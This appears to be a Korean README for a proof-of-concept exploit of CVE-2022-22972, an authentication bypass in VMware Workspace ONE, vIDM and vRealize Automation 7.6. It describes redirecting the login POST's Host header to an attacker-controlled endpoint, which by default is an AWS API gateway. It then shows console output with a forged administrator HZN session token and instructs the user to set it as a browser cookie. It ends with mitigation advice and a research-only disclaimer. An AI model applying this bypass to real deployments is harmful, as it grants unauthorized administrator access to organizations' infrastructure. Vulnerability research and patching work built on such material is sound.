
CVE-2022-22972를 위한 개념 증명 익스플로잇으로, VMware Workspace ONE, vIDM 및 vRealize Automation 7.6에서 Host header 조작을 통해 인증을 우회합니다.
CVE-2022-22972의 POC로, VMware Workspace ONE, vIDM 및 vRealize Automation 7.6에 영향을 미칩니다.
취약점에 대한 기술적 근본 원인 분석은 블로그에서 확인할 수 있습니다: https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive
이 스크립트는 CVE-2022-22972를 이용하여 vRealize Automation 7.6에서 인증을 우회하는 데 사용할 수 있습니다. Workspace ONE과 vIDM은 서로 다른 인증 엔드포인트를 가지고 있지만, 취약점의 핵심은 동일합니다. 흐름을 검증할 테스트 기사가 있다면 풀 리퀘스트를 기꺼이 받아들입니다.
이 스크립트는 VMware 인증 엔드포인트에 대한 HTTP POST 요청의 Host 헤더를 공격자가 제어하는 Host로 변경하여 작동합니다. 이로 인해 VMware 애플리케이션이 해당 Host에 자격 증명 정보를 요청하게 되고, Host가 200을 반환하면 사용자가 성공적으로 인증됩니다.
이 스크립트는 HZN 쿠키를 생성하며, 이후 요청에 포함시켜 손상된 사용자로 작업을 수행할 수 있습니다.
참고: 스크립트의 기본 인자는 블로그에서 언급된 특정 엔드포인트에 대해 200을 응답하도록 구성된 AWS API 게이트웨이로 인증 요청을 보냅니다. --host 옵션으로 이를 변경할 수 있습니다. 이 엔드포인트는 익스플로잇 흐름 중에 민감한 데이터를 수신하지 않습니다 - 취약한 애플리케이션이 가짜 인증 헤더와 함께 요청을 보내고 이에 응답할 뿐입니다.
dev@ubuntu:~/vmware/vra/exploit$ python3 CVE-2022-22972.py https://vra-app01.vra.intranet
Extracting state from vcac redirects...
Sending POST to auth endpoint
HZN=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJqdGkiOiJiM2E3MDJiOS01NjJkLTQwODgtYTg2Ny0xZjY5ZWE4YjAyZjMiLCJwcm4iOiJhZG1pbmlzdHJhdG9yQFZTUEhFUkUuTE9DQUwiLCJkb21haW4iOiJ2c3BoZXJlLmxvY2FsIiwidXNlcl9pZCI6IjMiLCJhdXRoX3RpbWUiOjE2NTM0MjUwOTAsImlzcyI6Imh0dHBzOi8vZWkzd3B0OTEwMC5leGVjdXRlLWFwaS51cy1lYXN0LTIuYW1hem9uYXdzLmNvbS9TQUFTL3QvdnNwaGVyZS5sb2NhbC9hdXRoIiwiYXVkIjoiaHR0cHM6Ly9laTN3cHQ5MTAwLmV4ZWN1dGUtYXBpLnVzLWVhc3QtMi5hbWF6b25hd3MuY29tL1NBQVMvdC92c3BoZXJlLmxvY2FsL2F1dGgvb2F1dGh0b2tlbiIsImN0eCI6Ilt7XCJtdGRcIjpcInVybjp2bXdhcmU6bmFtZXM6YWM6Y2xhc3NlczpMb2NhbFBhc3N3b3JkQXV0aFwiLFwiaWF0XCI6MTY1MzQyNTA5MCxcImlkXCI6M31dIiwic2NwIjoicHJvZmlsZSBhZG1pbiB1c2VyIGVtYWlsIG9wZXJhdG9yIiwiaWRwIjoiMiIsImVtbCI6ImFkbWluaXN0cmF0b3JAdnJhLWFwcDAxLnZyYS5pbnRyYW5ldCIsImNpZCI6IiIsImRpZCI6IiIsIndpZCI6IiIsInJ1bGVzIjp7ImV4cGlyeSI6MTY1MzQyNjg5MCwicnVsZXMiOlt7InJlc291cmNlcyI6WyIqIl0sImFjdGlvbnMiOlsiKiJdLCJjb25kaXRpb25zIjpudWxsfV0sImxpbmsiOm51bGx9LCJleHAiOjE2NTM0MjY4OTAsImlhdCI6MTY1MzQyNTA5MCwic3ViIjoiYWQzODkzODEtNTRmNS00ODFkLWFmNWEtOWZjNmIzOGI0NzQ0IiwicHJuX3R5cGUiOiJVU0VSIn0.Kkq2UnmqpW6yJb3GGCp7dSXc5PlU1y8YyDULIYLHIvYlB3OC4j5xFDy91a2tk4bi1lAUITymV-NUgweoCl15LXFVfBFYLEs-OAvMLKZhhGnFF-BrxmyYLPJutkxsi-gL0rF4VmYykuYw9tdUY2DghWiGGZ6QTYOts21QUzcvU-8
Set the HZN cookie in your browser to bypass authentication
최신 버전으로 업데이트하거나 VMSA의 지침에 따라 완화하십시오.
이 소프트웨어는 학술 연구 및 효과적인 방어 기술 개발을 목적으로만 제작되었으며, 명시적으로 승인된 경우를 제외하고 시스템 공격에 사용하기 위한 것이 아닙니다. 프로젝트 관리자는 소프트웨어의 오용에 대해 책임을 지지 않습니다. 책임감 있게 사용하십시오.